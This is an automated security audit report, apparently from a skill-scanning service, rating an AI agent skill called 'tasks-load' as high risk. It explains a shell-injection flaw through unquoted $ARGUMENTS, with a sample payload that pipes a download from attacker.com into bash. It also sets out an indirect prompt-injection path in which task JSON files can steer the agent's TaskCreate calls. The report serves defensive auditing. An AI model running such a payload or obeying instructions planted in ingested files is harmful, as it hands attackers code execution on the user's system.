tasks-load
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill performs direct shell interpolation of the `$ARGUMENTS` variable in several steps (Step 1, 2, and 3). Commands like `find projects/$ARGUMENTS/tasks` and `echo "$ARGUMENTS" > .claude-active-project` are susceptible to shell injection. An attacker providing a payload like `; curl attacker.com/exploit | bash ;` as a project name could achieve arbitrary code execution.
- [PROMPT_INJECTION] (HIGH): This skill is vulnerable to Indirect Prompt Injection. It ingests data from task JSON files located in the project directory and uses that data (subject, description, activeForm) to drive the `TaskCreate` tool.
  1. Ingestion points: Files matching `projects/$ARGUMENTS/tasks/**/*.json`.
  2. Boundary markers: Absent; the agent is instructed to read the raw JSON and use its fields.
  3. Capability inventory: `Bash`, `Read`, `TaskCreate`, `TaskUpdate`, `TaskList`.
  4. Sanitization: None; the skill does not specify any validation or escaping of the task content before processing it, allowing malicious task files to potentially hijack the agent's behavior.
Recommendations
- AI detected serious security threats